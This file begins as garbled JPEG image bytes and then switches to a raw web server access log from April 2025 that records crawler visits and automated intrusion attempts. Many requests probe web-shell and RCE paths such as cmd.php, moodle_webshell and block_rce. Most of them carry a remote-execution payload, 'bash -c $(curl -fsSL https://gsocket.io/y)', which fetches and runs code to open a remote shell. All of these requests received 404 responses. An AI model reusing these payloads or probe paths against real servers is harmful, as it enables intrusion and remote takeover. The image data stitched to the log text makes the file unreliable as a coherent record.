ÿØÿà JFIF 

  
 
  ÿÛ „ 	 ( %"1!%)+...383,7(-.+




-+++--++++---+-+-----+---------------+---+-++7-----ÿÀ  ß â
" 

ÿÄ   

           
 ÿÄ H 
     
 !1AQaq"‘¡2B±ÁÑð#R“Ò Tbr‚²á3csƒ’ÂñDS¢³$CÿÄ 
 


            
ÿÄ %

 
       
!1AQa"23‘ÿÚ 
  ? ôÿ ¨pŸªáÿ —åYõõ\?àÒü©ŠÄï¨pŸªáÿ —åYõõ\?àÓü©ŠÄá 0Ÿªáÿ Ÿå[úƒ	ú®ði~TÁb
qÐ8OÕpÿ ƒOò¤Oè`–RÂáœá™êi€ßÉ< FtŸI“öÌ8úDf´°å}“¾œ6
öFá°y¥jñÇh†ˆ¢ã/ÃÐ:ªcÈ
"Y¡ðÑl>ÿ ”ÏËte:qž\oäŠe÷󲍷˜HT4&ÿ ÓÐü6ö®¿øþßèô	Ÿ•7Ñi’•j|“ñì>b…þS?*Óôÿ ÓÐü*h¥£ír¶ü UãSç‚Ÿ[AÐaè[ûª•õ&õj?†Éö+EzP—WeÒírJFt	‘BŒ†Ï‡%#tE Øz ¥OÛ«!1›üä±Í™%º<!vB™'èÔ6´Ña¿«e`Àà0U[-ÂБ4)M÷YK*³hï÷%ÎÎkÇ«m‘-íWŽLsã?nÂ~«†üö®þ¡ÂlÃaÿ ‰ÿ l©°Õ¥ åÜá¿r ºL[Çâ°(Çè'Vãôl8´ÏRÀvLvPõ:…ÙNçF™÷ë>Íãö]°î(–:@<‹ŒÊö×òÆt¦ãº+‡¦%ÌÁ²h´OƒJŒtMÜ>ÀÜÊw3
Y´•牋4ǍýʏTì>œú=Íwhyë,¾Ôò×õ¿ßÊa»«þˆѪQ|%6ž™A	õ%:øj<>É—ÿ Å_ˆCbõ¥š±ý¯Ýƒï…¶|RëócÍf溪“t.СøTÿ *Ä¿-{†çàczůŽ_–^XþŒ±miB[X±d 1,é”zEù»&
î9gœf™9Ð'.;—™i}!ôšåîqêÛ٤ёý£½ÆA–àôe"A$˝Úsäÿ 
÷Û	#°xŸëí(l
	 »ý3—¥5m!
rt`†0~'j2(]S¦¦kv,ÚÇl¦øJA£Šƒ
J3E8ÙiŽ:cÉžúeZ°€¯\®kÖ(79«Ž:¯X”¾³Š&¡* ….‰Ž(ÜíŸ2¥ª‡×Hi²TF¤ò[¨íÈRëÉ䢍mgÑ.Ÿ<öäS0í„ǹÁU´f#Vß;Õ–…P@3ío<ä-±»Ž.L|kªÀê›fÂ6@»eu‚|ÓaÞÆŸ…¨ááå>åŠ?cKü6ùTÍÆ”†sĤÚ;H2RÚ†õ\Ö·Ÿn'¾ ñ#ºI¤Å´%çÁ­‚â7›‹qT3Iï¨Ö
Ú5I7Ë!ÅOóŸ¶øÝñØôת¦$Tcö‘[«Ö³šÒ';Aþ ¸èíg
A2Z
"i¸vdÄ÷.iõ®§)¿]¤À†–‡É&ä{V¶iŽ”.Ó×Õÿ û?h¬Mt–íª[ÿ Ñÿ ÌV(í}=ibÔ¡›¥¢±b
 Lô¥‡piη_Z<‡z§èŒ)iÖwiÇ 2hÙ3·=’d÷8éŽ1¦¸c¤µ€7›7Ø	ð\á)}	¹fËí›pAÃL%âc2 í§æQz¿;T8sæ°qø)QFMð‰XŒÂ±
N¢aF¨…8¯!U		Z©RÊ ÖPVÄÀÍin™Ì-GˆªÅËŠ›•zË}º±ŽÍFò¹}Uw×#ä5B¤{î}Ð<ÙD
é©¤&‡ïDbàÁôMÁ.51.89.152.52 - - [10/Apr/2025:21:11:13 +0300] "GET /login/index.php HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
51.89.152.52 - - [10/Apr/2025:21:11:13 +0300] "POST /login/index.php HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
159.223.79.39 - - [10/Apr/2025:21:50:31 +0300] "GET /login/index.php HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
159.223.79.39 - - [10/Apr/2025:21:50:32 +0300] "POST /login/index.php HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
159.223.79.39 - - [10/Apr/2025:23:40:18 +0300] "GET /login/index.php HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
159.223.79.39 - - [10/Apr/2025:23:40:18 +0300] "POST /login/index.php HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
51.8.102.226 - - [11/Apr/2025:00:42:05 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.126 - - [11/Apr/2025:01:03:41 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
93.123.109.101 - - [11/Apr/2025:03:13:59 +0300] "GET / HTTP/1.1" 200 27232 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0"
165.22.246.177 - - [11/Apr/2025:05:12:41 +0300] "GET / HTTP/1.1" 200 160775 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
165.22.246.177 - - [11/Apr/2025:05:12:42 +0300] "GET / HTTP/1.1" 200 160775 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
165.22.246.177 - - [11/Apr/2025:05:12:42 +0300] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
165.22.246.177 - - [11/Apr/2025:05:12:43 +0300] "GET /xmlrpc.php?rsd HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
165.22.246.177 - - [11/Apr/2025:05:12:43 +0300] "GET / HTTP/1.1" 200 160775 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
165.22.246.177 - - [11/Apr/2025:05:12:43 +0300] "GET /wp-login.php HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
161.35.99.63 - - [11/Apr/2025:05:19:50 +0300] "GET / HTTP/1.1" 200 32905 "-" "Mozilla/5.0 (compatible)"
172.203.190.136 - - [11/Apr/2025:05:44:19 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
194.38.23.16 - - [11/Apr/2025:05:57:41 +0300] "GET /admin/server/php/index.php?file=tf2rghf.jpg HTTP/1.1" 404 796 "-" "ALittle Client"
66.249.66.165 - - [11/Apr/2025:06:48:23 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.164 - - [11/Apr/2025:06:49:43 +0300] "GET /ads.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
190.92.204.17 - - [11/Apr/2025:07:02:26 +0300] "GET /admin/tool/mobile?NA HTTP/1.1" 404 796 "http://elearning.gluk.ac.ke/admin/tool/mobile?NA" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
47.82.10.9 - - [11/Apr/2025:11:05:31 +0300] "GET /web/assets/moment/min/moment-with-locales.min.js.map HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.79.0.139 - - [11/Apr/2025:11:05:58 +0300] "GET /web/assets/mediaelement/build/mediaelement-and-player.min.js.map HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.11.120 - - [11/Apr/2025:11:06:19 +0300] "GET /main/inc/lib/javascript/fontresize.js.map HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
206.168.34.69 - - [11/Apr/2025:11:36:28 +0300] "GET /favicon.ico HTTP/1.1" 404 796 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.69 - - [11/Apr/2025:11:36:39 +0300] "GET /favicon.ico HTTP/1.1" 404 796 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
47.82.11.136 - - [11/Apr/2025:11:04:48 +0300] "GET /web/assets/readmore-js/readmore.min.js.map HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.11.210 - - [11/Apr/2025:11:05:39 +0300] "GET /web/assets/image-map-resizer/js/imageMapResizer.min.js.map HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.11.235 - - [11/Apr/2025:11:06:12 +0300] "GET /web/assets/bootstrap-daterangepicker/daterangepicker.js.map HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.11.214 - - [11/Apr/2025:11:06:34 +0300] "GET /web/assets/modernizr/modernizr.js.map HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.10.3 - - [11/Apr/2025:11:08:44 +0300] "GET /main/inc/lib/javascript/bootstrap-select/js/i18n/defaults-en_US.min.js.map HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
206.168.34.69 - - [11/Apr/2025:11:36:25 +0300] "GET / HTTP/1.1" 200 32977 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
140.245.34.69 - - [11/Apr/2025:13:20:36 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
140.245.34.69 - - [11/Apr/2025:13:21:31 +0300] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
140.245.34.69 - - [11/Apr/2025:13:24:36 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
140.245.34.69 - - [11/Apr/2025:13:26:30 +0300] "GET /cmd.php?cmd=id HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
140.245.34.69 - - [11/Apr/2025:13:29:52 +0300] "GET /exec.php?exec=id HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
68.183.183.85 - - [11/Apr/2025:14:18:32 +0300] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:18:41 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:18:56 +0300] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:02 +0300] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:16 +0300] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:19 +0300] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:27 +0300] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:41 +0300] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:45 +0300] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:51 +0300] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:20:27 +0300] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:20:52 +0300] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:02 +0300] "GET /wp-content/upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:09 +0300] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:16 +0300] "GET /css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:19 +0300] "GET /js/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:23 +0300] "GET /foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:29 +0300] "GET /img/files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:32 +0300] "GET /files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:38 +0300] "GET /tmp/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:43 +0300] "GET /server/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:18:45 +0300] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:18:50 +0300] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:09 +0300] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:13 +0300] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:24 +0300] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:31 +0300] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:35 +0300] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:19:57 +0300] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:20:16 +0300] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:20:21 +0300] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:20:36 +0300] "GET /img/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:20:43 +0300] "GET /upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:20:48 +0300] "GET /uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:20:57 +0300] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:07 +0300] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:36 +0300] "GET /.tmb/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:54 +0300] "GET /upload/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:01 +0300] "GET /files/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:06 +0300] "GET /file/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:10 +0300] "GET /class/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:28 +0300] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:33 +0300] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:21:49 +0300] "GET /uploads/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:16 +0300] "GET /folders/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:22 +0300] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:26 +0300] "GET /upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:38 +0300] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:41 +0300] "GET /wp-content/upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:48 +0300] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:22:53 +0300] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:04 +0300] "GET /js/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:13 +0300] "GET /img/files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:22 +0300] "GET /.tmb/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:40 +0300] "GET /upload/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:50 +0300] "GET /class/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:55 +0300] "GET /folders/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:00 +0300] "GET /css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:09 +0300] "GET /foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:17 +0300] "GET /files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:28 +0300] "GET /tmp/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:31 +0300] "GET /server/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:35 +0300] "GET /uploads/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:43 +0300] "GET /files/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [11/Apr/2025:14:23:47 +0300] "GET /file/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
151.106.171.1 - - [11/Apr/2025:15:00:38 +0300] "GET /web/css/themes/Tehuti/images/header-logo-custom2.png HTTP/1.1" 404 796 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.171.1 - - [11/Apr/2025:15:00:38 +0300] "GET /web/css/themes/Tehuti/images/header-logo-custom2.png HTTP/1.1" 404 796 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.171.1 - - [11/Apr/2025:15:00:38 +0300] "GET /web/css/themes/Tehuti/images/header-logo-custom2.png HTTP/1.1" 404 796 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
